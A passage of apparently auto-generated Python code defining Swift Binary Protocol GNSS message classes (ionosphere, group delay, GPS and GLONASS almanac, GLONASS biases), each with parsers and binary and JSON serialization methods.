Optional sender ID, defaults to SENDER_ID (see sbp/msg.py).
"""
_parser = construct.Struct(
't_nmct' / construct.Struct(GPSTimeSec._parser),
'a0' / construct.Float64l,
'a1' / construct.Float64l,
'a2' / construct.Float64l,
'a3' / construct.Float64l,
'b0' / construct.Float64l,
'b1' / construct.Float64l,
'b2' / construct.Float64l,
'b3' / construct.Float64l,)
__slots__ = [
't_nmct',
'a0',
'a1',
'a2',
'a3',
'b0',
'b1',
'b2',
'b3',
]
def __init__(self, sbp=None, **kwargs):
if sbp:
super( MsgIono,
self).__init__(sbp.msg_type, sbp.sender, sbp.length,
sbp.payload, sbp.crc)
self.from_binary(sbp.payload)
else:
super( MsgIono, self).__init__()
self.msg_type = SBP_MSG_IONO
self.sender = kwargs.pop('sender', SENDER_ID)
self.t_nmct = kwargs.pop('t_nmct')
self.a0 = kwargs.pop('a0')
self.a1 = kwargs.pop('a1')
self.a2 = kwargs.pop('a2')
self.a3 = kwargs.pop('a3')
self.b0 = kwargs.pop('b0')
self.b1 = kwargs.pop('b1')
self.b2 = kwargs.pop('b2')
self.b3 = kwargs.pop('b3')
def __repr__(self):
return fmt_repr(self)
@staticmethod
def from_json(s):
"""Given a JSON-encoded string s, build a message object.
"""
d = json.loads(s)
return MsgIono.from_json_dict(d)
@staticmethod
def from_json_dict(d):
sbp = SBP.from_json_dict(d)
return MsgIono(sbp, **d)
def from_binary(self, d):
"""Given a binary payload d, update the appropriate payload fields of
the message.
"""
p = MsgIono._parser.parse(d)
for n in self.__class__.__slots__:
setattr(self, n, getattr(p, n))
def to_binary(self):
"""Produce a framed/packed SBP message.
"""
c = containerize(exclude_fields(self))
self.payload = MsgIono._parser.build(c)
return self.pack()
def into_buffer(self, buf, offset):
"""Produce a framed/packed SBP message into the provided buffer and offset.
"""
self.payload = containerize(exclude_fields(self))
self.parser = MsgIono._parser
self.stream_payload.reset(buf, offset)
return self.pack_into(buf, offset, self._build_payload)
def to_json_dict(self):
self.to_binary()
d = super( MsgIono, self).to_json_dict()
j = walk_json_dict(exclude_fields(self))
d.update(j)
return d
SBP_MSG_SV_CONFIGURATION_GPS_DEP = 0x0091
class MsgSvConfigurationGPSDep(SBP):
"""SBP class for message MSG_SV_CONFIGURATION_GPS_DEP (0x0091).
You can have MSG_SV_CONFIGURATION_GPS_DEP inherit its fields directly
from an inherited SBP object, or construct it inline using a dict
of its fields.
Please see ICD-GPS-200 (Chapter 20.3.3.5.1.4) for more details.
Parameters
----------
sbp : SBP
SBP parent object to inherit from.
t_nmct : GPSTimeSec
Navigation Message Correction Table Valitidy Time
l2c_mask : int
L2C capability mask, SV32 bit being MSB, SV1 bit being LSB
sender : int
Optional sender ID, defaults to SENDER_ID (see sbp/msg.py).
"""
_parser = construct.Struct(
't_nmct' / construct.Struct(GPSTimeSec._parser),
'l2c_mask' / construct.Int32ul,)
__slots__ = [
't_nmct',
'l2c_mask',
]
def __init__(self, sbp=None, **kwargs):
if sbp:
super( MsgSvConfigurationGPSDep,
self).__init__(sbp.msg_type, sbp.sender, sbp.length,
sbp.payload, sbp.crc)
self.from_binary(sbp.payload)
else:
super( MsgSvConfigurationGPSDep, self).__init__()
self.msg_type = SBP_MSG_SV_CONFIGURATION_GPS_DEP
self.sender = kwargs.pop('sender', SENDER_ID)
self.t_nmct = kwargs.pop('t_nmct')
self.l2c_mask = kwargs.pop('l2c_mask')
def __repr__(self):
return fmt_repr(self)
@staticmethod
def from_json(s):
"""Given a JSON-encoded string s, build a message object.
"""
d = json.loads(s)
return MsgSvConfigurationGPSDep.from_json_dict(d)
@staticmethod
def from_json_dict(d):
sbp = SBP.from_json_dict(d)
return MsgSvConfigurationGPSDep(sbp, **d)
def from_binary(self, d):
"""Given a binary payload d, update the appropriate payload fields of
the message.
"""
p = MsgSvConfigurationGPSDep._parser.parse(d)
for n in self.__class__.__slots__:
setattr(self, n, getattr(p, n))
def to_binary(self):
"""Produce a framed/packed SBP message.
"""
c = containerize(exclude_fields(self))
self.payload = MsgSvConfigurationGPSDep._parser.build(c)
return self.pack()
def into_buffer(self, buf, offset):
"""Produce a framed/packed SBP message into the provided buffer and offset.
"""
self.payload = containerize(exclude_fields(self))
self.parser = MsgSvConfigurationGPSDep._parser
self.stream_payload.reset(buf, offset)
return self.pack_into(buf, offset, self._build_payload)
def to_json_dict(self):
self.to_binary()
d = super( MsgSvConfigurationGPSDep, self).to_json_dict()
j = walk_json_dict(exclude_fields(self))
d.update(j)
return d
SBP_MSG_GNSS_CAPB = 0x0096
class MsgGnssCapb(SBP):
"""SBP class for message MSG_GNSS_CAPB (0x0096).
You can have MSG_GNSS_CAPB inherit its fields directly
from an inherited SBP object, or construct it inline using a dict
of its fields.
Parameters
----------
sbp : SBP
SBP parent object to inherit from.
t_nmct : GPSTimeSec
Navigation Message Correction Table Validity Time
gc : GnssCapb
GNSS capabilities masks
sender : int
Optional sender ID, defaults to SENDER_ID (see sbp/msg.py).
"""
_parser = construct.Struct(
't_nmct' / construct.Struct(GPSTimeSec._parser),
'gc' / construct.Struct(GnssCapb._parser),)
__slots__ = [
't_nmct',
'gc',
]
def __init__(self, sbp=None, **kwargs):
if sbp:
super( MsgGnssCapb,
self).__init__(sbp.msg_type, sbp.sender, sbp.length,
sbp.payload, sbp.crc)
self.from_binary(sbp.payload)
else:
super( MsgGnssCapb, self).__init__()
self.msg_type = SBP_MSG_GNSS_CAPB
self.sender = kwargs.pop('sender', SENDER_ID)
self.t_nmct = kwargs.pop('t_nmct')
self.gc = kwargs.pop('gc')
def __repr__(self):
return fmt_repr(self)
@staticmethod
def from_json(s):
"""Given a JSON-encoded string s, build a message object.
"""
d = json.loads(s)
return MsgGnssCapb.from_json_dict(d)
@staticmethod
def from_json_dict(d):
sbp = SBP.from_json_dict(d)
return MsgGnssCapb(sbp, **d)
def from_binary(self, d):
"""Given a binary payload d, update the appropriate payload fields of
the message.
"""
p = MsgGnssCapb._parser.parse(d)
for n in self.__class__.__slots__:
setattr(self, n, getattr(p, n))
def to_binary(self):
"""Produce a framed/packed SBP message.
"""
c = containerize(exclude_fields(self))
self.payload = MsgGnssCapb._parser.build(c)
return self.pack()
def into_buffer(self, buf, offset):
"""Produce a framed/packed SBP message into the provided buffer and offset.
"""
self.payload = containerize(exclude_fields(self))
self.parser = MsgGnssCapb._parser
self.stream_payload.reset(buf, offset)
return self.pack_into(buf, offset, self._build_payload)
def to_json_dict(self):
self.to_binary()
d = super( MsgGnssCapb, self).to_json_dict()
j = walk_json_dict(exclude_fields(self))
d.update(j)
return d
SBP_MSG_GROUP_DELAY_DEP_A = 0x0092
class MsgGroupDelayDepA(SBP):
"""SBP class for message MSG_GROUP_DELAY_DEP_A (0x0092).
You can have MSG_GROUP_DELAY_DEP_A inherit its fields directly
from an inherited SBP object, or construct it inline using a dict
of its fields.
Please see ICD-GPS-200 (30.3.3.3.1.1) for more details.
Parameters
----------
sbp : SBP
SBP parent object to inherit from.
t_op : GPSTimeDep
Data Predict Time of Week
prn : int
Satellite number
valid : int
bit-field indicating validity of the values,
LSB indicating tgd validity etc.
1 = value is valid, 0 = value is not valid.
tgd : int
isc_l1ca : int
isc_l2c : int
sender : int
Optional sender ID, defaults to SENDER_ID (see sbp/msg.py).
"""
_parser = construct.Struct(
't_op' / construct.Struct(GPSTimeDep._parser),
'prn' / construct.Int8ul,
'valid' / construct.Int8ul,
'tgd' / construct.Int16sl,
'isc_l1ca' / construct.Int16sl,
'isc_l2c' / construct.Int16sl,)
__slots__ = [
't_op',
'prn',
'valid',
'tgd',
'isc_l1ca',
'isc_l2c',
]
def __init__(self, sbp=None, **kwargs):
if sbp:
super( MsgGroupDelayDepA,
self).__init__(sbp.msg_type, sbp.sender, sbp.length,
sbp.payload, sbp.crc)
self.from_binary(sbp.payload)
else:
super( MsgGroupDelayDepA, self).__init__()
self.msg_type = SBP_MSG_GROUP_DELAY_DEP_A
self.sender = kwargs.pop('sender', SENDER_ID)
self.t_op = kwargs.pop('t_op')
self.prn = kwargs.pop('prn')
self.valid = kwargs.pop('valid')
self.tgd = kwargs.pop('tgd')
self.isc_l1ca = kwargs.pop('isc_l1ca')
self.isc_l2c = kwargs.pop('isc_l2c')
def __repr__(self):
return fmt_repr(self)
@staticmethod
def from_json(s):
"""Given a JSON-encoded string s, build a message object.
"""
d = json.loads(s)
return MsgGroupDelayDepA.from_json_dict(d)
@staticmethod
def from_json_dict(d):
sbp = SBP.from_json_dict(d)
return MsgGroupDelayDepA(sbp, **d)
def from_binary(self, d):
"""Given a binary payload d, update the appropriate payload fields of
the message.
"""
p = MsgGroupDelayDepA._parser.parse(d)
for n in self.__class__.__slots__:
setattr(self, n, getattr(p, n))
def to_binary(self):
"""Produce a framed/packed SBP message.
"""
c = containerize(exclude_fields(self))
self.payload = MsgGroupDelayDepA._parser.build(c)
return self.pack()
def into_buffer(self, buf, offset):
"""Produce a framed/packed SBP message into the provided buffer and offset.
"""
self.payload = containerize(exclude_fields(self))
self.parser = MsgGroupDelayDepA._parser
self.stream_payload.reset(buf, offset)
return self.pack_into(buf, offset, self._build_payload)
def to_json_dict(self):
self.to_binary()
d = super( MsgGroupDelayDepA, self).to_json_dict()
j = walk_json_dict(exclude_fields(self))
d.update(j)
return d
SBP_MSG_GROUP_DELAY_DEP_B = 0x0093
class MsgGroupDelayDepB(SBP):
"""SBP class for message MSG_GROUP_DELAY_DEP_B (0x0093).
You can have MSG_GROUP_DELAY_DEP_B inherit its fields directly
from an inherited SBP object, or construct it inline using a dict
of its fields.
Please see ICD-GPS-200 (30.3.3.3.1.1) for more details.
Parameters
----------
sbp : SBP
SBP parent object to inherit from.
t_op : GPSTimeSec
Data Predict Time of Week
sid : GnssSignalDep
GNSS signal identifier
valid : int
bit-field indicating validity of the values,
LSB indicating tgd validity etc.
1 = value is valid, 0 = value is not valid.
tgd : int
isc_l1ca : int
isc_l2c : int
sender : int
Optional sender ID, defaults to SENDER_ID (see sbp/msg.py).
"""
_parser = construct.Struct(
't_op' / construct.Struct(GPSTimeSec._parser),
'sid' / construct.Struct(GnssSignalDep._parser),
'valid' / construct.Int8ul,
'tgd' / construct.Int16sl,
'isc_l1ca' / construct.Int16sl,
'isc_l2c' / construct.Int16sl,)
__slots__ = [
't_op',
'sid',
'valid',
'tgd',
'isc_l1ca',
'isc_l2c',
]
def __init__(self, sbp=None, **kwargs):
if sbp:
super( MsgGroupDelayDepB,
self).__init__(sbp.msg_type, sbp.sender, sbp.length,
sbp.payload, sbp.crc)
self.from_binary(sbp.payload)
else:
super( MsgGroupDelayDepB, self).__init__()
self.msg_type = SBP_MSG_GROUP_DELAY_DEP_B
self.sender = kwargs.pop('sender', SENDER_ID)
self.t_op = kwargs.pop('t_op')
self.sid = kwargs.pop('sid')
self.valid = kwargs.pop('valid')
self.tgd = kwargs.pop('tgd')
self.isc_l1ca = kwargs.pop('isc_l1ca')
self.isc_l2c = kwargs.pop('isc_l2c')
def __repr__(self):
return fmt_repr(self)
@staticmethod
def from_json(s):
"""Given a JSON-encoded string s, build a message object.
"""
d = json.loads(s)
return MsgGroupDelayDepB.from_json_dict(d)
@staticmethod
def from_json_dict(d):
sbp = SBP.from_json_dict(d)
return MsgGroupDelayDepB(sbp, **d)
def from_binary(self, d):
"""Given a binary payload d, update the appropriate payload fields of
the message.
"""
p = MsgGroupDelayDepB._parser.parse(d)
for n in self.__class__.__slots__:
setattr(self, n, getattr(p, n))
def to_binary(self):
"""Produce a framed/packed SBP message.
"""
c = containerize(exclude_fields(self))
self.payload = MsgGroupDelayDepB._parser.build(c)
return self.pack()
def into_buffer(self, buf, offset):
"""Produce a framed/packed SBP message into the provided buffer and offset.
"""
self.payload = containerize(exclude_fields(self))
self.parser = MsgGroupDelayDepB._parser
self.stream_payload.reset(buf, offset)
return self.pack_into(buf, offset, self._build_payload)
def to_json_dict(self):
self.to_binary()
d = super( MsgGroupDelayDepB, self).to_json_dict()
j = walk_json_dict(exclude_fields(self))
d.update(j)
return d
SBP_MSG_GROUP_DELAY = 0x0094
class MsgGroupDelay(SBP):
"""SBP class for message MSG_GROUP_DELAY (0x0094).
You can have MSG_GROUP_DELAY inherit its fields directly
from an inherited SBP object, or construct it inline using a dict
of its fields.
Please see ICD-GPS-200 (30.3.3.3.1.1) for more details.
Parameters
----------
sbp : SBP
SBP parent object to inherit from.
t_op : GPSTimeSec
Data Predict Time of Week
sid : GnssSignal
GNSS signal identifier
valid : int
bit-field indicating validity of the values,
LSB indicating tgd validity etc.
1 = value is valid, 0 = value is not valid.
tgd : int
isc_l1ca : int
isc_l2c : int
sender : int
Optional sender ID, defaults to SENDER_ID (see sbp/msg.py).
"""
_parser = construct.Struct(
't_op' / construct.Struct(GPSTimeSec._parser),
'sid' / construct.Struct(GnssSignal._parser),
'valid' / construct.Int8ul,
'tgd' / construct.Int16sl,
'isc_l1ca' / construct.Int16sl,
'isc_l2c' / construct.Int16sl,)
__slots__ = [
't_op',
'sid',
'valid',
'tgd',
'isc_l1ca',
'isc_l2c',
]
def __init__(self, sbp=None, **kwargs):
if sbp:
super( MsgGroupDelay,
self).__init__(sbp.msg_type, sbp.sender, sbp.length,
sbp.payload, sbp.crc)
self.from_binary(sbp.payload)
else:
super( MsgGroupDelay, self).__init__()
self.msg_type = SBP_MSG_GROUP_DELAY
self.sender = kwargs.pop('sender', SENDER_ID)
self.t_op = kwargs.pop('t_op')
self.sid = kwargs.pop('sid')
self.valid = kwargs.pop('valid')
self.tgd = kwargs.pop('tgd')
self.isc_l1ca = kwargs.pop('isc_l1ca')
self.isc_l2c = kwargs.pop('isc_l2c')
def __repr__(self):
return fmt_repr(self)
@staticmethod
def from_json(s):
"""Given a JSON-encoded string s, build a message object.
"""
d = json.loads(s)
return MsgGroupDelay.from_json_dict(d)
@staticmethod
def from_json_dict(d):
sbp = SBP.from_json_dict(d)
return MsgGroupDelay(sbp, **d)
def from_binary(self, d):
"""Given a binary payload d, update the appropriate payload fields of
the message.
"""
p = MsgGroupDelay._parser.parse(d)
for n in self.__class__.__slots__:
setattr(self, n, getattr(p, n))
def to_binary(self):
"""Produce a framed/packed SBP message.
"""
c = containerize(exclude_fields(self))
self.payload = MsgGroupDelay._parser.build(c)
return self.pack()
def into_buffer(self, buf, offset):
"""Produce a framed/packed SBP message into the provided buffer and offset.
"""
self.payload = containerize(exclude_fields(self))
self.parser = MsgGroupDelay._parser
self.stream_payload.reset(buf, offset)
return self.pack_into(buf, offset, self._build_payload)
def to_json_dict(self):
self.to_binary()
d = super( MsgGroupDelay, self).to_json_dict()
j = walk_json_dict(exclude_fields(self))
d.update(j)
return d
SBP_MSG_ALMANAC_GPS_DEP = 0x0070
class MsgAlmanacGPSDep(SBP):
"""SBP class for message MSG_ALMANAC_GPS_DEP (0x0070).
You can have MSG_ALMANAC_GPS_DEP inherit its fields directly
from an inherited SBP object, or construct it inline using a dict
of its fields.
The almanac message returns a set of satellite orbit parameters. Almanac
data is not very precise and is considered valid for up to several months.
Please see the Navstar GPS Space Segment/Navigation user interfaces
(ICD-GPS-200, Chapter 20.3.3.5.1.2 Almanac Data) for more details.
Parameters
----------
sbp : SBP
SBP parent object to inherit from.
common : AlmanacCommonContentDep
Values common for all almanac types
m0 : double
Mean anomaly at reference time
ecc : double
Eccentricity of satellite orbit
sqrta : double
Square root of the semi-major axis of orbit
omega0 : double
Longitude of ascending node of orbit plane at weekly epoch
omegadot : double
Rate of right ascension
w : double
Argument of perigee
inc : double
Inclination
af0 : double
Polynomial clock correction coefficient (clock bias)
af1 : double
Polynomial clock correction coefficient (clock drift)
sender : int
Optional sender ID, defaults to SENDER_ID (see sbp/msg.py).
"""
_parser = construct.Struct(
'common' / construct.Struct(AlmanacCommonContentDep._parser),
'm0' / construct.Float64l,
'ecc' / construct.Float64l,
'sqrta' / construct.Float64l,
'omega0' / construct.Float64l,
'omegadot' / construct.Float64l,
'w' / construct.Float64l,
'inc' / construct.Float64l,
'af0' / construct.Float64l,
'af1' / construct.Float64l,)
__slots__ = [
'common',
'm0',
'ecc',
'sqrta',
'omega0',
'omegadot',
'w',
'inc',
'af0',
'af1',
]
def __init__(self, sbp=None, **kwargs):
if sbp:
super( MsgAlmanacGPSDep,
self).__init__(sbp.msg_type, sbp.sender, sbp.length,
sbp.payload, sbp.crc)
self.from_binary(sbp.payload)
else:
super( MsgAlmanacGPSDep, self).__init__()
self.msg_type = SBP_MSG_ALMANAC_GPS_DEP
self.sender = kwargs.pop('sender', SENDER_ID)
self.common = kwargs.pop('common')
self.m0 = kwargs.pop('m0')
self.ecc = kwargs.pop('ecc')
self.sqrta = kwargs.pop('sqrta')
self.omega0 = kwargs.pop('omega0')
self.omegadot = kwargs.pop('omegadot')
self.w = kwargs.pop('w')
self.inc = kwargs.pop('inc')
self.af0 = kwargs.pop('af0')
self.af1 = kwargs.pop('af1')
def __repr__(self):
return fmt_repr(self)
@staticmethod
def from_json(s):
"""Given a JSON-encoded string s, build a message object.
"""
d = json.loads(s)
return MsgAlmanacGPSDep.from_json_dict(d)
@staticmethod
def from_json_dict(d):
sbp = SBP.from_json_dict(d)
return MsgAlmanacGPSDep(sbp, **d)
def from_binary(self, d):
"""Given a binary payload d, update the appropriate payload fields of
the message.
"""
p = MsgAlmanacGPSDep._parser.parse(d)
for n in self.__class__.__slots__:
setattr(self, n, getattr(p, n))
def to_binary(self):
"""Produce a framed/packed SBP message.
"""
c = containerize(exclude_fields(self))
self.payload = MsgAlmanacGPSDep._parser.build(c)
return self.pack()
def into_buffer(self, buf, offset):
"""Produce a framed/packed SBP message into the provided buffer and offset.
"""
self.payload = containerize(exclude_fields(self))
self.parser = MsgAlmanacGPSDep._parser
self.stream_payload.reset(buf, offset)
return self.pack_into(buf, offset, self._build_payload)
def to_json_dict(self):
self.to_binary()
d = super( MsgAlmanacGPSDep, self).to_json_dict()
j = walk_json_dict(exclude_fields(self))
d.update(j)
return d
SBP_MSG_ALMANAC_GPS = 0x0072
class MsgAlmanacGPS(SBP):
"""SBP class for message MSG_ALMANAC_GPS (0x0072).
You can have MSG_ALMANAC_GPS inherit its fields directly
from an inherited SBP object, or construct it inline using a dict
of its fields.
The almanac message returns a set of satellite orbit parameters. Almanac
data is not very precise and is considered valid for up to several months.
Please see the Navstar GPS Space Segment/Navigation user interfaces
(ICD-GPS-200, Chapter 20.3.3.5.1.2 Almanac Data) for more details.
Parameters
----------
sbp : SBP
SBP parent object to inherit from.
common : AlmanacCommonContent
Values common for all almanac types
m0 : double
Mean anomaly at reference time
ecc : double
Eccentricity of satellite orbit
sqrta : double
Square root of the semi-major axis of orbit
omega0 : double
Longitude of ascending node of orbit plane at weekly epoch
omegadot : double
Rate of right ascension
w : double
Argument of perigee
inc : double
Inclination
af0 : double
Polynomial clock correction coefficient (clock bias)
af1 : double
Polynomial clock correction coefficient (clock drift)
sender : int
Optional sender ID, defaults to SENDER_ID (see sbp/msg.py).
"""
_parser = construct.Struct(
'common' / construct.Struct(AlmanacCommonContent._parser),
'm0' / construct.Float64l,
'ecc' / construct.Float64l,
'sqrta' / construct.Float64l,
'omega0' / construct.Float64l,
'omegadot' / construct.Float64l,
'w' / construct.Float64l,
'inc' / construct.Float64l,
'af0' / construct.Float64l,
'af1' / construct.Float64l,)
__slots__ = [
'common',
'm0',
'ecc',
'sqrta',
'omega0',
'omegadot',
'w',
'inc',
'af0',
'af1',
]
def __init__(self, sbp=None, **kwargs):
if sbp:
super( MsgAlmanacGPS,
self).__init__(sbp.msg_type, sbp.sender, sbp.length,
sbp.payload, sbp.crc)
self.from_binary(sbp.payload)
else:
super( MsgAlmanacGPS, self).__init__()
self.msg_type = SBP_MSG_ALMANAC_GPS
self.sender = kwargs.pop('sender', SENDER_ID)
self.common = kwargs.pop('common')
self.m0 = kwargs.pop('m0')
self.ecc = kwargs.pop('ecc')
self.sqrta = kwargs.pop('sqrta')
self.omega0 = kwargs.pop('omega0')
self.omegadot = kwargs.pop('omegadot')
self.w = kwargs.pop('w')
self.inc = kwargs.pop('inc')
self.af0 = kwargs.pop('af0')
self.af1 = kwargs.pop('af1')
def __repr__(self):
return fmt_repr(self)
@staticmethod
def from_json(s):
"""Given a JSON-encoded string s, build a message object.
"""
d = json.loads(s)
return MsgAlmanacGPS.from_json_dict(d)
@staticmethod
def from_json_dict(d):
sbp = SBP.from_json_dict(d)
return MsgAlmanacGPS(sbp, **d)
def from_binary(self, d):
"""Given a binary payload d, update the appropriate payload fields of
the message.
"""
p = MsgAlmanacGPS._parser.parse(d)
for n in self.__class__.__slots__:
setattr(self, n, getattr(p, n))
def to_binary(self):
"""Produce a framed/packed SBP message.
"""
c = containerize(exclude_fields(self))
self.payload = MsgAlmanacGPS._parser.build(c)
return self.pack()
def into_buffer(self, buf, offset):
"""Produce a framed/packed SBP message into the provided buffer and offset.
"""
self.payload = containerize(exclude_fields(self))
self.parser = MsgAlmanacGPS._parser
self.stream_payload.reset(buf, offset)
return self.pack_into(buf, offset, self._build_payload)
def to_json_dict(self):
self.to_binary()
d = super( MsgAlmanacGPS, self).to_json_dict()
j = walk_json_dict(exclude_fields(self))
d.update(j)
return d
SBP_MSG_ALMANAC_GLO_DEP = 0x0071
class MsgAlmanacGloDep(SBP):
"""SBP class for message MSG_ALMANAC_GLO_DEP (0x0071).
You can have MSG_ALMANAC_GLO_DEP inherit its fields directly
from an inherited SBP object, or construct it inline using a dict
of its fields.
The almanac message returns a set of satellite orbit parameters. Almanac
data is not very precise and is considered valid for up to several months.
Please see the GLO ICD 5.1 "Chapter 4.5 Non-immediate information and
almanac" for details.
Parameters
----------
sbp : SBP
SBP parent object to inherit from.
common : AlmanacCommonContentDep
Values common for all almanac types
lambda_na : double
Longitude of the first ascending node of the orbit in PZ-90.02
coordinate system
t_lambda_na : double
Time of the first ascending node passage
i : double
Value of inclination at instant of t_lambda
t : double
Value of Draconian period at instant of t_lambda
t_dot : double
Rate of change of the Draconian period
epsilon : double
Eccentricity at instant of t_lambda
omega : double
Argument of perigee at instant of t_lambda
sender : int
Optional sender ID, defaults to SENDER_ID (see sbp/msg.py).
"""
_parser = construct.Struct(
'common' / construct.Struct(AlmanacCommonContentDep._parser),
'lambda_na' / construct.Float64l,
't_lambda_na' / construct.Float64l,
'i' / construct.Float64l,
't' / construct.Float64l,
't_dot' / construct.Float64l,
'epsilon' / construct.Float64l,
'omega' / construct.Float64l,)
__slots__ = [
'common',
'lambda_na',
't_lambda_na',
'i',
't',
't_dot',
'epsilon',
'omega',
]
def __init__(self, sbp=None, **kwargs):
if sbp:
super( MsgAlmanacGloDep,
self).__init__(sbp.msg_type, sbp.sender, sbp.length,
sbp.payload, sbp.crc)
self.from_binary(sbp.payload)
else:
super( MsgAlmanacGloDep, self).__init__()
self.msg_type = SBP_MSG_ALMANAC_GLO_DEP
self.sender = kwargs.pop('sender', SENDER_ID)
self.common = kwargs.pop('common')
self.lambda_na = kwargs.pop('lambda_na')
self.t_lambda_na = kwargs.pop('t_lambda_na')
self.i = kwargs.pop('i')
self.t = kwargs.pop('t')
self.t_dot = kwargs.pop('t_dot')
self.epsilon = kwargs.pop('epsilon')
self.omega = kwargs.pop('omega')
def __repr__(self):
return fmt_repr(self)
@staticmethod
def from_json(s):
"""Given a JSON-encoded string s, build a message object.
"""
d = json.loads(s)
return MsgAlmanacGloDep.from_json_dict(d)
@staticmethod
def from_json_dict(d):
sbp = SBP.from_json_dict(d)
return MsgAlmanacGloDep(sbp, **d)
def from_binary(self, d):
"""Given a binary payload d, update the appropriate payload fields of
the message.
"""
p = MsgAlmanacGloDep._parser.parse(d)
for n in self.__class__.__slots__:
setattr(self, n, getattr(p, n))
def to_binary(self):
"""Produce a framed/packed SBP message.
"""
c = containerize(exclude_fields(self))
self.payload = MsgAlmanacGloDep._parser.build(c)
return self.pack()
def into_buffer(self, buf, offset):
"""Produce a framed/packed SBP message into the provided buffer and offset.
"""
self.payload = containerize(exclude_fields(self))
self.parser = MsgAlmanacGloDep._parser
self.stream_payload.reset(buf, offset)
return self.pack_into(buf, offset, self._build_payload)
def to_json_dict(self):
self.to_binary()
d = super( MsgAlmanacGloDep, self).to_json_dict()
j = walk_json_dict(exclude_fields(self))
d.update(j)
return d
SBP_MSG_ALMANAC_GLO = 0x0073
class MsgAlmanacGlo(SBP):
"""SBP class for message MSG_ALMANAC_GLO (0x0073).
You can have MSG_ALMANAC_GLO inherit its fields directly
from an inherited SBP object, or construct it inline using a dict
of its fields.
The almanac message returns a set of satellite orbit parameters. Almanac
data is not very precise and is considered valid for up to several months.
Please see the GLO ICD 5.1 "Chapter 4.5 Non-immediate information and
almanac" for details.
Parameters
----------
sbp : SBP
SBP parent object to inherit from.
common : AlmanacCommonContent
Values common for all almanac types
lambda_na : double
Longitude of the first ascending node of the orbit in PZ-90.02
coordinate system
t_lambda_na : double
Time of the first ascending node passage
i : double
Value of inclination at instant of t_lambda
t : double
Value of Draconian period at instant of t_lambda
t_dot : double
Rate of change of the Draconian period
epsilon : double
Eccentricity at instant of t_lambda
omega : double
Argument of perigee at instant of t_lambda
sender : int
Optional sender ID, defaults to SENDER_ID (see sbp/msg.py).
"""
_parser = construct.Struct(
'common' / construct.Struct(AlmanacCommonContent._parser),
'lambda_na' / construct.Float64l,
't_lambda_na' / construct.Float64l,
'i' / construct.Float64l,
't' / construct.Float64l,
't_dot' / construct.Float64l,
'epsilon' / construct.Float64l,
'omega' / construct.Float64l,)
__slots__ = [
'common',
'lambda_na',
't_lambda_na',
'i',
't',
't_dot',
'epsilon',
'omega',
]
def __init__(self, sbp=None, **kwargs):
if sbp:
super( MsgAlmanacGlo,
self).__init__(sbp.msg_type, sbp.sender, sbp.length,
sbp.payload, sbp.crc)
self.from_binary(sbp.payload)
else:
super( MsgAlmanacGlo, self).__init__()
self.msg_type = SBP_MSG_ALMANAC_GLO
self.sender = kwargs.pop('sender', SENDER_ID)
self.common = kwargs.pop('common')
self.lambda_na = kwargs.pop('lambda_na')
self.t_lambda_na = kwargs.pop('t_lambda_na')
self.i = kwargs.pop('i')
self.t = kwargs.pop('t')
self.t_dot = kwargs.pop('t_dot')
self.epsilon = kwargs.pop('epsilon')
self.omega = kwargs.pop('omega')
def __repr__(self):
return fmt_repr(self)
@staticmethod
def from_json(s):
"""Given a JSON-encoded string s, build a message object.
"""
d = json.loads(s)
return MsgAlmanacGlo.from_json_dict(d)
@staticmethod
def from_json_dict(d):
sbp = SBP.from_json_dict(d)
return MsgAlmanacGlo(sbp, **d)
def from_binary(self, d):
"""Given a binary payload d, update the appropriate payload fields of
the message.
"""
p = MsgAlmanacGlo._parser.parse(d)
for n in self.__class__.__slots__:
setattr(self, n, getattr(p, n))
def to_binary(self):
"""Produce a framed/packed SBP message.
"""
c = containerize(exclude_fields(self))
self.payload = MsgAlmanacGlo._parser.build(c)
return self.pack()
def into_buffer(self, buf, offset):
"""Produce a framed/packed SBP message into the provided buffer and offset.
"""
self.payload = containerize(exclude_fields(self))
self.parser = MsgAlmanacGlo._parser
self.stream_payload.reset(buf, offset)
return self.pack_into(buf, offset, self._build_payload)
def to_json_dict(self):
self.to_binary()
d = super( MsgAlmanacGlo, self).to_json_dict()
j = walk_json_dict(exclude_fields(self))
d.update(j)
return d
SBP_MSG_GLO_BIASES = 0x0075
class MsgGloBiases(SBP):
"""SBP class for message MSG_GLO_BIASES (0x0075).
You can have MSG_GLO_BIASES inherit its fields directly
from an inherited SBP object, or construct it inline using a dict
of its fields.
The GLONASS L1/L2 Code-Phase biases allows to perform
GPS+GLONASS integer ambiguity resolution for baselines
with mixed receiver types (e.g. receiver of different
manufacturers)
Parameters
----------
sbp : SBP
SBP parent object to inherit from.
mask : int
GLONASS FDMA signals mask
l1ca_bias : int
GLONASS L1 C/A Code-Phase Bias
l1p_bias : int
GLONASS L1 P Code-Phase Bias
l2ca_bias : int
GLONASS L2 C/A Code-Phase Bias
l2p_bias : int
GLONASS L2 P Code-Phase Bias
sender : int
Optional sender ID, defaults to SENDER_ID (see sbp/msg.py).
"""
_parser = construct.Struct(
'mask' / construct.Int8ul,
'l1ca_bias' / construct.Int16sl,
'l1p_bias' / construct.Int16sl,
'l2ca_bias' / construct.Int16sl,
'l2p_bias' / construct.Int16sl,)
__slots__ = [
'mask',
'l1ca_bias',
'l1p_bias',
'l2ca_bias',
'l2p_bias',
]
def __init__(self, sbp=None, **kwargs):
if sbp:
super( MsgGloBiases,
self).__init__(sbp.msg_type, sbp.sender, sbp.length,
sbp.payload, sbp.crc)
self.from_binary(sbp.payload)
else:
super( MsgGloBiases, self).__init__()
self.msg_type = SBP_MSG_GLO_BIASES
self.sender = kwargs.pop('sender', SENDER_ID)
self.mask = kwargs.pop('mask')
self.l1ca_bias = kwargs.pop('l1ca_bias')
self.l1p_bias = kwargs.pop('l1p_bias')
self.l2ca_bias = kwargs.pop('l2ca_bias')
self.l2p_bias = kwargs.pop('l2p_bias')
def __repr__(self):
return fmt_repr(self)
@staticmethod
def from_json(s):
"""Given a JSON-encoded string s, build a message object.
"""
d = json.loads(s)
return MsgGloBiases.from_json_dict(d)
@staticmethod
def from_json_dict(d):
sbp = SBP.from_json_dict(d)
return MsgGloBiases(sbp, **d)
def from_binary(self, d):
"""Given a binary payload d, update the appropriate payload fields of
the message.
"""
p = MsgGloBiases._parser.parse(d)
for n in self.__class__.__slots__:
setattr(self, n, getattr(p, n))
def to_binary(self):
"""Produce a framed/packed SBP message.
"""
c = containerize(exclude_fields(self))
self.payload = MsgGloBiases._parser.build(c)
return self.pack()
def into_buffer(self, buf, offset):
"""Produce a framed/packed SBP message into the provided buffer and offset.
"""
self.payload = containerize(exclude_fields(self))
self.parser = MsgGloBiases._parser
self.stream_payload.reset(buf, offset)
return self.pack_into(buf, offset, self._build_payload)
